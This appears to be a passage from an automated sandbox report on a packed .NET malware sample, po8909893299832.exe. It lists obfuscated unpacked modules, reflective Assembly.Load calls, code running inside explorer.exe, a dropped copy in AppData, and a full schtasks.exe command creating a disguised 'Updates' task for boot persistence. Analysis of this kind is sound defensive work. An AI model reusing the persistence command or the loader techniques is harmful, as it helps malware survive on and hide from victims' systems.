Source: InXlDTKncKkCk.exe.0.dr, MsgBx.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.po8909893299832.exe.4d80000.4.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	.Net Code: Gc3JujKCKLERSog4UEp System.Reflection.Assembly.Load(byte[])
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, JfpsmYXLTXSZHXDVdB.cs	.Net Code: DPPkhZI9sRn1BYoks3L System.Reflection.Assembly.Load(byte[])
Source: 0.2.po8909893299832.exe.2515d4c.0.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	.Net Code: Gc3JujKCKLERSog4UEp System.Reflection.Assembly.Load(byte[])
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, JfpsmYXLTXSZHXDVdB.cs	.Net Code: DPPkhZI9sRn1BYoks3L System.Reflection.Assembly.Load(byte[])
Source: 10.2.explorer.exe.1049f840.0.raw.unpack, MsgBx.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 11.2.InXlDTKncKkCk.exe.2bf5d70.1.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	.Net Code: Gc3JujKCKLERSog4UEp System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A109AD push ecx; mov dword ptr [esp], ecx	9_2_01A109B6
Source: C:\Windows\explorer.exe	Code function: 10_2_0E07BB02 push esp; retn 0000h	10_2_0E07BB03
Source: C:\Windows\explorer.exe	Code function: 10_2_0E07BB1E push esp; retn 0000h	10_2_0E07BB1F
Source: C:\Windows\explorer.exe	Code function: 10_2_0E07B9B5 push esp; retn 0000h	10_2_0E07BAE7
Source: C:\Windows\explorer.exe	Code function: 10_2_0E400B02 push esp; retn 0000h	10_2_0E400B03
Source: C:\Windows\explorer.exe	Code function: 10_2_0E400B1E push esp; retn 0000h	10_2_0E400B1F
Source: C:\Windows\explorer.exe	Code function: 10_2_0E4009B5 push esp; retn 0000h	10_2_0E400AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_0F8F19B5 push esp; retn 0000h	10_2_0F8F1AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_0F8F1B02 push esp; retn 0000h	10_2_0F8F1B03
Source: C:\Windows\explorer.exe	Code function: 10_2_0F8F1B1E push esp; retn 0000h	10_2_0F8F1B1F
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 11_2_0114E980 pushad ; retf	11_2_0114E989
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041D4B5 push eax; ret	16_2_0041D508
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041D56C push eax; ret	16_2_0041D572
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041D502 push eax; ret	16_2_0041D508
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_0041D50B push eax; ret	16_2_0041D572
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00417D11 push esi; iretd	16_2_00417D14
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00416698 push 3C7FC06Ch; ret	16_2_0041669D
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F109AD push ecx; mov dword ptr [esp], ecx	16_2_00F109B6
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00EE1368 push eax; iretd	16_2_00EE1369
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00F67E99 push ecx; ret	16_2_00F67EAC
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 16_2_00EE1FEC push eax; iretd	16_2_00EE1FED

Source: po8909893299832.exe	Static PE information: section name: .text entropy: 7.9631320059403645
Source: InXlDTKncKkCk.exe.0.dr	Static PE information: section name: .text entropy: 7.9631320059403645

Source: 0.2.po8909893299832.exe.4d80000.4.raw.unpack, K4VVbTCGN4q2c8lCCj.cs	High entropy of concatenated method names: 'G3KbyTLLkM4Bb', 'si9SO65af8rO14mjPDU', 'bBffTJ5RQH5OqC4Gea9', 'ovKlj65mCkfoxl0nYKf', 'BWF7CK5kxuHeQeFkeiK', 'qwHs9D5fCc7yK8DUC5g', 'CQU41K5NJrprlOnEHS0', 'RhSTw15QcpoAFlp1KXj', 'nntNvk5jVxrl8qAx10M', 'uNAC9m5VOKsj7MEAs02'
Source: 0.2.po8909893299832.exe.4d80000.4.raw.unpack, q1bUrWhd8NtMR4Tat2.cs	High entropy of concatenated method names: 'FtMrR4Tat', 'asVbu6B2r', 'BfjKHvjWV', 'r8MoiUGvh', 'dTGON4q2c', 'brXv00T5r', 'Dispose', 'q1bhUrWd8', 'zN8XoTN4OjYAicjyxg', 'ruXo51Q9ZfIq3o9q7i'
Source: 0.2.po8909893299832.exe.4d80000.4.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	High entropy of concatenated method names: 'An354LdEp', 'zbMnKODFs', 'B6jqN3UrZ', 'QkT3JtuA7', 'rmgQyVns4', 'CtlpashST', 'Bh5RaqMVd', 'PW46FiDNh', 'W34ldUSmX', 'AVZwxu1MB'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, st16SUQGDBRb8WDfMA.cs	High entropy of concatenated method names: 'ncLi1GaCEd', 'aLFiBoTYI5', 'ToString', 'qCmijtv03X', 'PwFiHbLdsS', 'pTKiZldoHt', 'NnAiyiOLvJ', 'Gt5ifjiRW8', 'neKiq1IbB9', 'kAPiXKg8Kb'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, nLriCKwn03yoXN6Yj4.cs	High entropy of concatenated method names: 'GjmtomXLwj', 'z9gtdJ5OHe', 'wENtwWrJHd', 'QVLtP4N8u2', 'BTLtDF7K5T', 'fint9xjI6N', 'OETtV3MKrE', 'uGCtectXM5', 'mg2tMGFGuT', 'lEvtv0HTqt'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, xURDPsIraG9srVqyL1.cs	High entropy of concatenated method names: 'YQqZcUgR7x', 'a5nZxGLlTR', 'pNcZl0a0Qi', 'WFTZItFBr3', 'A7WZtjiaCH', 'jVLZS8XiuL', 'CMIZiM1Upx', 'j6pZmsXBIH', 'NXTZkh8Muf', 'XnVZ4x7R1t'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, pLjUSTL1pQCEvuw1Rs.cs	High entropy of concatenated method names: 'XnaOqsLMVT', 'gEpOX0AB3V', 'craO1G9srV', 'jyLOB1lORS', 'yoQOtYn0pr', 'LhmOSvwbvo', 't31CmQukDapBXnQm9X', 'jQ3rVFmTY4HYYlbj7H', 'Au4OOgLeK7', 'QJMOsuEB5u'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, NIdsZyvvrOEn3dWaPk.cs	High entropy of concatenated method names: 'WmnqjnAhri', 'HdIqZsjWKv', 'vQPqf44jFy', 'ogGfnfgfIT', 'CPAfzGjsZb', 'n8gqJhaA4p', 'wSmqOX0296', 'pk9q0LmihG', 'cLNqs8JMfd', 'h8SqLUgUJc'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, M92KIROsg6VFgWVn4mU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yC24wGIsVE', 'OrG4PTxEh6', 'iGo4pfHU2p', 'SAS4QpKDPV', 'sh345GYwTG', 'MnC4gEdleF', 'rYU4bhqfLt'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, iNhhPnFImXUNFpeBhB.cs	High entropy of concatenated method names: 'Fm5qrmoQDD', 'OEoqUlHSj5', 'WlSqAMdLoQ', 'K4nqcTbBle', 'OEcqKMswR1', 'EdkqxUToTe', 'Q3cq8dxD05', 'l17qly0Qc9', 'lu4qI2wIk4', 'TrDqCgCjbF'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, WsLMVTlHEp0AB3VIJd.cs	High entropy of concatenated method names: 'UnmHw0HPKp', 'BPPHPXQ60j', 'RbiHptmVUh', 'qhTHQTmceL', 'rn6H5672rm', 'OiuHgjvD5U', 'nvLHbZaETu', 'kMsHaXrTbr', 'qaZH3WfHB1', 'LOgHnEcwnc'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, bpruhmGvwbvoa98iIi.cs	High entropy of concatenated method names: 'VVMf6mebc1', 's2EfHMUPjG', 'hJjfyAS0YF', 'CwUfq7TWfM', 'a0vfXXqIJd', 'UKWy5HvAup', 'OXqygTQAYK', 'Nj1ybK8sDB', 'DO8yaieJ8S', 'nvjy330Wx0'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, IIVM1taKeOlA49ukB0.cs	High entropy of concatenated method names: 'zRwmjbyefb', 'cDlmH9kDio', 'MrWmZw02KP', 'cSImy6GwEF', 'mpYmf3rbov', 'nOrmqkxRCf', 'cb6mXvWR3H', 'nCEm72F5TA', 'a3Am1lQ5DM', 'tl3mBkOpMh'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, EORSweC4W6Iy1roQYn.cs	High entropy of concatenated method names: 'y4SyKA65AD', 'EPBy8KwDs9', 'AgGZ9ltJkE', 'aDkZVK5yhv', 'lsnZeKkqk2', 'JWhZMxfHtq', 'bk4ZvHHpYR', 'U1mZulXSf6', 'Ko0ZFWSkVE', 'Sa9ZoPORdj'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, pDf7aIOJHM2cWfnGWvO.cs	High entropy of concatenated method names: 'lOSkrWMSW3', 'f0SkUfSaMp', 'oFikA0Lc84', 'pl2kcPQQjt', 'mKUkKZlv9K', 'QEMkx5bqx2', 'bKok8XU1OT', 'sjUkluCsUb', 'qFDkIJZieR', 'wPokClqLu1'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, sUn3wNn9JNE4jh7eBi.cs	High entropy of concatenated method names: 'dHukOB8XmZ', 'wHOksVw2fN', 'UcqkLaILAq', 'RfckjOy2dH', 'bQTkHbOGZe', 'MVtkyiBcPf', 'MkvkfXjubs', 'GqHmbY2np5', 'MO1maRhueS', 'QKjm31lLSg'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, lI485igx2TfKBTBsnd.cs	High entropy of concatenated method names: 'AOFiamDKKX', 'yBxinqvO1a', 'DRYmJ7J5dt', 'DafmOUtwDK', 'vdLiRTO1he', 'rViiduSIU1', 'PfmiYoUj1w', 'QgHiwXfV28', 'pQgiPm9Irp', 'nqkipmsoYI'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, lZZmVF3VglavHQmuAU.cs	High entropy of concatenated method names: 'K2jmGHMyPO', 'EShmDKrxfR', 'jFam9PoJwv', 'gVgmV8Ckhi', 'QI0mwZtIVe', 'GAOmeSjSpn', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, e9XmcQZ5yLaRB8QWCU.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jZq03qIEeT', 'tDF0nR5E5R', 'MNX0zSiaFX', 'iT0sJav1If', 'pm9sO5n6Kd', 'hocs0T1vVD', 'YYassFItmu', 'TPq6xVIIxoj4niXivPj'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, GK7Aqd0T7u0HeDp6yR.cs	High entropy of concatenated method names: 'wPYAOq03L', 'KipcV64r5', 'XEaxdqb6v', 'oLF81opol', 'kKXIwkFaL', 'PM7C5lpZh', 'xQ1fNvFJ5o6ZaDTMGK', 'yNfSGQVeUqixuEPE8W', 'cNkm1fFmQ', 'XWY4g3imH'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, vlaVCXpmF9dCxxPo5m.cs	High entropy of concatenated method names: 'ToString', 'tS8SRyPOTj', 'dFOSDI34LG', 'DcvS9SQg5s', 'UCcSVb7hi8', 'NZBSeMay8k', 'JX2SM8R3TV', 'NEQSvkBVXR', 't7vSue2b5h', 'KHVSFMuNF9'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, dVq4iMHhhsOxnMjCfy.cs	High entropy of concatenated method names: 'Dispose', 'fGOO3Ulurd', 'LBl0DhYSJA', 'jBeLLUvbyM', 'IVIOnVM1tK', 'JOlOzA49uk', 'ProcessDialogKey', 'm010JZZmVF', 'Igl0OavHQm', 'MAU004Un3w'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, JfpsmYXLTXSZHXDVdB.cs	High entropy of concatenated method names: 'ujOs6JSAIs', 'I4jsjhECFy', 'vdVsHYVwN4', 'DVJsZcsJOl', 'Vd1sytWtmj', 'XA8sfYi7Uh', 'FUfsqrOCDW', 'we3sXSSpvm', 'Lexs7dxdEo', 'vpts1TiY1k'
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, TOKR4WYKUbsvpHWWgO.cs	High entropy of concatenated method names: 'DQR2ltZDCI', 'A2G2Ij74DV', 'qmI2GIkkse', 'GHQ2DjCxHg', 'yfK2VFJFjH', 'Abx2etRSwW', 'drl2voHQxf', 't2a2uvJpFM', 'bnP2o8Rdbp', 'aR42RKTXrO'
Source: 0.2.po8909893299832.exe.2515d4c.0.raw.unpack, K4VVbTCGN4q2c8lCCj.cs	High entropy of concatenated method names: 'G3KbyTLLkM4Bb', 'si9SO65af8rO14mjPDU', 'bBffTJ5RQH5OqC4Gea9', 'ovKlj65mCkfoxl0nYKf', 'BWF7CK5kxuHeQeFkeiK', 'qwHs9D5fCc7yK8DUC5g', 'CQU41K5NJrprlOnEHS0', 'RhSTw15QcpoAFlp1KXj', 'nntNvk5jVxrl8qAx10M', 'uNAC9m5VOKsj7MEAs02'
Source: 0.2.po8909893299832.exe.2515d4c.0.raw.unpack, q1bUrWhd8NtMR4Tat2.cs	High entropy of concatenated method names: 'FtMrR4Tat', 'asVbu6B2r', 'BfjKHvjWV', 'r8MoiUGvh', 'dTGON4q2c', 'brXv00T5r', 'Dispose', 'q1bhUrWd8', 'zN8XoTN4OjYAicjyxg', 'ruXo51Q9ZfIq3o9q7i'
Source: 0.2.po8909893299832.exe.2515d4c.0.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	High entropy of concatenated method names: 'An354LdEp', 'zbMnKODFs', 'B6jqN3UrZ', 'QkT3JtuA7', 'rmgQyVns4', 'CtlpashST', 'Bh5RaqMVd', 'PW46FiDNh', 'W34ldUSmX', 'AVZwxu1MB'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, st16SUQGDBRb8WDfMA.cs	High entropy of concatenated method names: 'ncLi1GaCEd', 'aLFiBoTYI5', 'ToString', 'qCmijtv03X', 'PwFiHbLdsS', 'pTKiZldoHt', 'NnAiyiOLvJ', 'Gt5ifjiRW8', 'neKiq1IbB9', 'kAPiXKg8Kb'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, nLriCKwn03yoXN6Yj4.cs	High entropy of concatenated method names: 'GjmtomXLwj', 'z9gtdJ5OHe', 'wENtwWrJHd', 'QVLtP4N8u2', 'BTLtDF7K5T', 'fint9xjI6N', 'OETtV3MKrE', 'uGCtectXM5', 'mg2tMGFGuT', 'lEvtv0HTqt'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, xURDPsIraG9srVqyL1.cs	High entropy of concatenated method names: 'YQqZcUgR7x', 'a5nZxGLlTR', 'pNcZl0a0Qi', 'WFTZItFBr3', 'A7WZtjiaCH', 'jVLZS8XiuL', 'CMIZiM1Upx', 'j6pZmsXBIH', 'NXTZkh8Muf', 'XnVZ4x7R1t'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, pLjUSTL1pQCEvuw1Rs.cs	High entropy of concatenated method names: 'XnaOqsLMVT', 'gEpOX0AB3V', 'craO1G9srV', 'jyLOB1lORS', 'yoQOtYn0pr', 'LhmOSvwbvo', 't31CmQukDapBXnQm9X', 'jQ3rVFmTY4HYYlbj7H', 'Au4OOgLeK7', 'QJMOsuEB5u'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, NIdsZyvvrOEn3dWaPk.cs	High entropy of concatenated method names: 'WmnqjnAhri', 'HdIqZsjWKv', 'vQPqf44jFy', 'ogGfnfgfIT', 'CPAfzGjsZb', 'n8gqJhaA4p', 'wSmqOX0296', 'pk9q0LmihG', 'cLNqs8JMfd', 'h8SqLUgUJc'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, M92KIROsg6VFgWVn4mU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yC24wGIsVE', 'OrG4PTxEh6', 'iGo4pfHU2p', 'SAS4QpKDPV', 'sh345GYwTG', 'MnC4gEdleF', 'rYU4bhqfLt'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, iNhhPnFImXUNFpeBhB.cs	High entropy of concatenated method names: 'Fm5qrmoQDD', 'OEoqUlHSj5', 'WlSqAMdLoQ', 'K4nqcTbBle', 'OEcqKMswR1', 'EdkqxUToTe', 'Q3cq8dxD05', 'l17qly0Qc9', 'lu4qI2wIk4', 'TrDqCgCjbF'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, WsLMVTlHEp0AB3VIJd.cs	High entropy of concatenated method names: 'UnmHw0HPKp', 'BPPHPXQ60j', 'RbiHptmVUh', 'qhTHQTmceL', 'rn6H5672rm', 'OiuHgjvD5U', 'nvLHbZaETu', 'kMsHaXrTbr', 'qaZH3WfHB1', 'LOgHnEcwnc'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, bpruhmGvwbvoa98iIi.cs	High entropy of concatenated method names: 'VVMf6mebc1', 's2EfHMUPjG', 'hJjfyAS0YF', 'CwUfq7TWfM', 'a0vfXXqIJd', 'UKWy5HvAup', 'OXqygTQAYK', 'Nj1ybK8sDB', 'DO8yaieJ8S', 'nvjy330Wx0'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, IIVM1taKeOlA49ukB0.cs	High entropy of concatenated method names: 'zRwmjbyefb', 'cDlmH9kDio', 'MrWmZw02KP', 'cSImy6GwEF', 'mpYmf3rbov', 'nOrmqkxRCf', 'cb6mXvWR3H', 'nCEm72F5TA', 'a3Am1lQ5DM', 'tl3mBkOpMh'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, EORSweC4W6Iy1roQYn.cs	High entropy of concatenated method names: 'y4SyKA65AD', 'EPBy8KwDs9', 'AgGZ9ltJkE', 'aDkZVK5yhv', 'lsnZeKkqk2', 'JWhZMxfHtq', 'bk4ZvHHpYR', 'U1mZulXSf6', 'Ko0ZFWSkVE', 'Sa9ZoPORdj'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, pDf7aIOJHM2cWfnGWvO.cs	High entropy of concatenated method names: 'lOSkrWMSW3', 'f0SkUfSaMp', 'oFikA0Lc84', 'pl2kcPQQjt', 'mKUkKZlv9K', 'QEMkx5bqx2', 'bKok8XU1OT', 'sjUkluCsUb', 'qFDkIJZieR', 'wPokClqLu1'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, sUn3wNn9JNE4jh7eBi.cs	High entropy of concatenated method names: 'dHukOB8XmZ', 'wHOksVw2fN', 'UcqkLaILAq', 'RfckjOy2dH', 'bQTkHbOGZe', 'MVtkyiBcPf', 'MkvkfXjubs', 'GqHmbY2np5', 'MO1maRhueS', 'QKjm31lLSg'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, lI485igx2TfKBTBsnd.cs	High entropy of concatenated method names: 'AOFiamDKKX', 'yBxinqvO1a', 'DRYmJ7J5dt', 'DafmOUtwDK', 'vdLiRTO1he', 'rViiduSIU1', 'PfmiYoUj1w', 'QgHiwXfV28', 'pQgiPm9Irp', 'nqkipmsoYI'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, lZZmVF3VglavHQmuAU.cs	High entropy of concatenated method names: 'K2jmGHMyPO', 'EShmDKrxfR', 'jFam9PoJwv', 'gVgmV8Ckhi', 'QI0mwZtIVe', 'GAOmeSjSpn', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, e9XmcQZ5yLaRB8QWCU.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jZq03qIEeT', 'tDF0nR5E5R', 'MNX0zSiaFX', 'iT0sJav1If', 'pm9sO5n6Kd', 'hocs0T1vVD', 'YYassFItmu', 'TPq6xVIIxoj4niXivPj'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, GK7Aqd0T7u0HeDp6yR.cs	High entropy of concatenated method names: 'wPYAOq03L', 'KipcV64r5', 'XEaxdqb6v', 'oLF81opol', 'kKXIwkFaL', 'PM7C5lpZh', 'xQ1fNvFJ5o6ZaDTMGK', 'yNfSGQVeUqixuEPE8W', 'cNkm1fFmQ', 'XWY4g3imH'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, vlaVCXpmF9dCxxPo5m.cs	High entropy of concatenated method names: 'ToString', 'tS8SRyPOTj', 'dFOSDI34LG', 'DcvS9SQg5s', 'UCcSVb7hi8', 'NZBSeMay8k', 'JX2SM8R3TV', 'NEQSvkBVXR', 't7vSue2b5h', 'KHVSFMuNF9'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, dVq4iMHhhsOxnMjCfy.cs	High entropy of concatenated method names: 'Dispose', 'fGOO3Ulurd', 'LBl0DhYSJA', 'jBeLLUvbyM', 'IVIOnVM1tK', 'JOlOzA49uk', 'ProcessDialogKey', 'm010JZZmVF', 'Igl0OavHQm', 'MAU004Un3w'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, JfpsmYXLTXSZHXDVdB.cs	High entropy of concatenated method names: 'ujOs6JSAIs', 'I4jsjhECFy', 'vdVsHYVwN4', 'DVJsZcsJOl', 'Vd1sytWtmj', 'XA8sfYi7Uh', 'FUfsqrOCDW', 'we3sXSSpvm', 'Lexs7dxdEo', 'vpts1TiY1k'
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, TOKR4WYKUbsvpHWWgO.cs	High entropy of concatenated method names: 'DQR2ltZDCI', 'A2G2Ij74DV', 'qmI2GIkkse', 'GHQ2DjCxHg', 'yfK2VFJFjH', 'Abx2etRSwW', 'drl2voHQxf', 't2a2uvJpFM', 'bnP2o8Rdbp', 'aR42RKTXrO'
Source: 11.2.InXlDTKncKkCk.exe.2bf5d70.1.raw.unpack, K4VVbTCGN4q2c8lCCj.cs	High entropy of concatenated method names: 'G3KbyTLLkM4Bb', 'si9SO65af8rO14mjPDU', 'bBffTJ5RQH5OqC4Gea9', 'ovKlj65mCkfoxl0nYKf', 'BWF7CK5kxuHeQeFkeiK', 'qwHs9D5fCc7yK8DUC5g', 'CQU41K5NJrprlOnEHS0', 'RhSTw15QcpoAFlp1KXj', 'nntNvk5jVxrl8qAx10M', 'uNAC9m5VOKsj7MEAs02'
Source: 11.2.InXlDTKncKkCk.exe.2bf5d70.1.raw.unpack, q1bUrWhd8NtMR4Tat2.cs	High entropy of concatenated method names: 'FtMrR4Tat', 'asVbu6B2r', 'BfjKHvjWV', 'r8MoiUGvh', 'dTGON4q2c', 'brXv00T5r', 'Dispose', 'q1bhUrWd8', 'zN8XoTN4OjYAicjyxg', 'ruXo51Q9ZfIq3o9q7i'
Source: 11.2.InXlDTKncKkCk.exe.2bf5d70.1.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	High entropy of concatenated method names: 'An354LdEp', 'zbMnKODFs', 'B6jqN3UrZ', 'QkT3JtuA7', 'rmgQyVns4', 'CtlpashST', 'Bh5RaqMVd', 'PW46FiDNh', 'W34ldUSmX', 'AVZwxu1MB'

Source: C:\Users\user\Desktop\po8909893299832.exe

File created: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\po8909893299832.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp6E21.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
